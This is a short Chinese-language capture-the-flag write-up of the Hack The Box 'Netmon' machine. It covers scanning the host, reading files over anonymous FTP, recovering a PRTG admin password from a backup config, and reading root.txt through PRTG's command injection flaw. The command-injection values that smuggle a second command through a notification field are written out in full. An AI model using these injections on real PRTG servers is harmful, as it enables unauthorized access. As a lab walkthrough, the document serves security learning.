[Hack the box]Netmon-Windows-10.10.10.152

nmap先掃一波:

root@kali:~# nmap -sV -sT -sC -T5 10.10.10.152
Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-22 20:46 EDT
Warning: 10.10.10.152 giving up on port because retransmission cap hit (2).
Stats: 0:01:07 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 98.98% done; ETC: 20:47 (0:00:00 remaining)
Nmap scan report for 10.10.10.152
Host is up (0.22s latency).
Not shown: 887 closed ports, 108 filtered ports
PORT    STATE SERVICE      VERSION
21/tcp  open  ftp          Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 02-03-19  12:18AM                 1024 .rnd
| 02-25-19  10:15PM       <DIR>          inetpub
| 07-16-16  09:18AM       <DIR>          PerfLogs
| 02-25-19  10:56PM       <DIR>          Program Files
| 02-03-19  12:28AM       <DIR>          Program Files (x86)
| 02-03-19  08:08AM       <DIR>          Users
|_02-25-19  11:49PM       <DIR>          Windows
80/tcp  open  http         Indy httpd 18.1.37.13946 (Paessler PRTG bandwidth monitor)
|_http-server-header: PRTG/18.1.37.13946
| http-title: Welcome | PRTG Network Monitor (NETMON)
|_Requested resource was /index.htm
|_http-trane-info: Problem with XML parsing of /evox/about
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2019-04-22 20:47:28
|_  start_date: 2019-04-22 20:31:55

可以匿名訪問21端口:
ftp://10.10.10.152/Users/Public/user.txt

80端口運(yùn)行PRTG Network Monitor服務(wù)
在c:\Windows\下發(fā)現(xiàn)配置文件restart.bat

net stop PRTGCoreService
copy "c:\Windows\PRTG Configuration.dat" "C:\ProgramData\Paessler\PRTG Network Monitor"
net start PRTGCoreService

進(jìn)而在C:\ProgramData\Paessler\PRTG Network Monitor目錄中發(fā)現(xiàn)備份文件PRTG Configuration.old.bak,查找到明文用戶名密碼,嘗試登陸后失敗,PrTg@dmin2019登陸成功。


google一波漏洞:PRTG < 18.2.39 Command Injection Vulnerability


先查看一下目錄結(jié)構(gòu):
test.txt;tree /f c:\Users\Administrator > c:\output.txt

調(diào)整時(shí)間為6s使其反應(yīng)迅速

成功導(dǎo)出文件

接著讀取root.txt,相同操作即可
test.txt;more c:\Users\Administrator\Desktop\root.txt > c:\output1.txt

參考WP

?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時(shí)請(qǐng)結(jié)合常識(shí)與多方信息審慎甄別。
平臺(tái)聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點(diǎn),簡(jiǎn)書系信息發(fā)布平臺(tái),僅提供信息存儲(chǔ)服務(wù)。

相關(guān)閱讀更多精彩內(nèi)容

友情鏈接更多精彩內(nèi)容